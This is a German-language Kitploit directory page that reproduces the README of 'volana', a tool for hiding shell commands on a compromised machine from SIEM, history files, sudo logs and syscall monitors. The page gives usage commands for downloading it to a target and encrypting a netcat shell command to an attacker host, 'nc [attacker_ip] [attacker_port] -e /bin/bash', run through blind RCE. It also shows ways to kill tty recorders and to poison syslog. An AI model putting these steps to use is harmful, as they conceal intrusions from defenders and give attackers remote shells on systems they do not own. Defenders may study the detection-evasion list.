Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
volana — 🌒 Shell-Befehlsobfuskation zur Umgehung von Erkennungssystemen | Kitploit
Tools/GitHubGitHub/ariary/volana
ExploitationIDS/IPS-UmgehungShellcodePenetrationstestsCommand and ControlRed Teaming
GitHubariary/volana

volana

🌒 Shell-Befehlsobfuskation zur Umgehung von Erkennungssystemen

Repository anzeigen
12097vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

volana (Mond auf Malagasisch)

root@kitploit:~
{ Benutze es ; 🌚(verstecken vor); 🌞(erkannt von) } 

Shell-Befehl-Verschleierung zur Umgehung von SIEM/Erkennungssystemen

Während eines Pentests ist ein wichtiger Aspekt, unauffällig zu sein. Aus diesem Grund solltest du deine Spuren nach deinem Aufenthalt verwischen. Dennoch protokollieren viele Infrastrukturen Befehle und senden sie in Echtzeit an ein SIEM, was die anschließende Reinigung allein nutzlos macht. bietet eine einfache Möglichkeit, auf einer kompromittierten Maschine ausgeführte Befehle zu verstecken, indem es eine eigene Shell-Laufzeitumgebung bereitstellt (Befehl eingeben, volana führt ihn aus). Auf diese Weise verwischst du deine Spuren deines Aufenthalts.

Tool herunterladen


volana
WÄHREND

Verwendung

Du brauchst eine interaktive Shell. (Finde einen Weg, sie zu starten, du bist ein Hacker, das ist dein Job! ansonsten). Lade sie dann auf der Zielmaschine herunter und starte sie. Das war's, jetzt kannst du die Befehle eingeben, die du unauffällig ausführen möchtest.

root@kitploit:~
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

Schlüsselwörter für die volana-Konsole:

  • ring: aktiviert den Ringmodus, d.h. jeder Befehl wird mit vielen anderen gestartet, um die Spuren zu verwischen (vor Lösungen, die Systemaufrufe überwachen)
  • exit: volana-Konsole beenden

aus einer nicht interaktiven Shell

Stell dir vor, du hast eine nicht interaktive Shell (Webshell oder blindes RCE). Du könntest die Unterbefehle encrypt und decrypt verwenden. Zuvor musst du volana mit eingebettetem Verschlüsselungsschlüssel erstellen.

Auf der Angreifermaschine

root@kitploit:~
## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Kopiere den verschlüsselten Befehl und führe ihn mit deinem RCE auf der Zielmaschine aus

root@kitploit:~
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Warum nicht einfach den Befehl mit echo [command] | base64 verstecken? Und auf dem Ziel mit echo [encoded_command] | base64 -d | bash dekodieren?

Weil wir vor Systemen geschützt sein wollen, die bei Verwendung von base64 einen Alarm auslösen oder nach Base64-Text im Befehl suchen. Außerdem wollen wir die Untersuchung erschweren, und Base64 ist keine echte Hürde.

Erkennung

Beachte, dass volana kein Wundermittel ist, das dich völlig unsichtbar macht. Sein Ziel ist es, die Erkennung von Eindringlingen und die Untersuchung zu erschweren.

Mit 'erkannt' meinen wir, ob es möglich ist, einen Alarm auszulösen, wenn ein bestimmter Befehl ausgeführt wurde.

Verstecken vor

Nur die Befehlszeile zum Starten von volana wird erfasst. 🧠 Wenn du jedoch ein Leerzeichen vor der Ausführung hinzufügst, speichert das Standard-Bash-Verhalten es nicht.

  • Erkennungssysteme, die auf der Ausgabe des History-Befehls basieren
  • Erkennungssysteme, die auf History-Dateien basieren
    • .bash_history, ".zsh_history" etc ..
  • Erkennungssysteme, die auf Bash-Debug-Traps basieren
  • Erkennungssysteme, die auf dem integrierten Sudo-Protokollierungssystem basieren
  • Erkennungssysteme, die alle Systemaufrufe von Prozessen systemweit verfolgen (z.B. opensnoop)
  • Terminal-(tty)-Aufzeichner (script, screen -L, sexonthebash, ovh-ttyrec, usw.)
    • Leicht zu erkennen und zu umgehen: pkill -9 script
    • Kein häufiger Fall
    • screen ist etwas schwieriger zu umgehen, zeichnet jedoch keine Eingaben auf (Geheimeingabe: stty -echo => umgehen)
    • Die Befehlserkennung könnte mit volana mit Verschlüsselung umgangen werden

Sichtbar für

  • Erkennungssysteme, die einen Alarm für unbekannte Befehle haben (den von volana)
  • Erkennungssysteme, die auf Keyloggern basieren
    • Leicht zu umgehen: Befehle kopieren/einfügen
    • Kein häufiger Fall
  • Erkennungssysteme, die auf Syslog-Dateien basieren (z.B. /var/log/auth.log)
    • Nur für sudo- oder su-Befehle
    • Syslog-Datei könnte modifiziert und nach Belieben vergiftet werden (z.B. für /var/log/auth.log: logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Erkennungssysteme, die auf Systemaufrufen basieren (z.B. auditd, LKML/eBPF)
    • Schwer zu analysieren, könnten durch mehrere Ablenkungs-Systemaufrufe unlesbar gemacht werden
  • Benutzerdefinierte LD_PRELOAD-Injektion zur Protokollierung
    • Überhaupt kein häufiger Fall

Bug Bounty

Entschuldigung für den Clickbait-Titel, aber es wird kein Geld für Beitragende geben. 🐛

Lass mich wissen, wenn du Folgendes gefunden hast:

  • einen Weg, volana zu erkennen
  • einen Weg, die Konsole auszuspionieren, der volana-Befehle nicht erkennt
  • einen Weg, ein Erkennungssystem zu umgehen

Melde es hier

Danksagung

  • 8 ways to spy on console
  • moonwalk: ähnliches Tool, das Spuren NACH dem Aufenthalt verwischt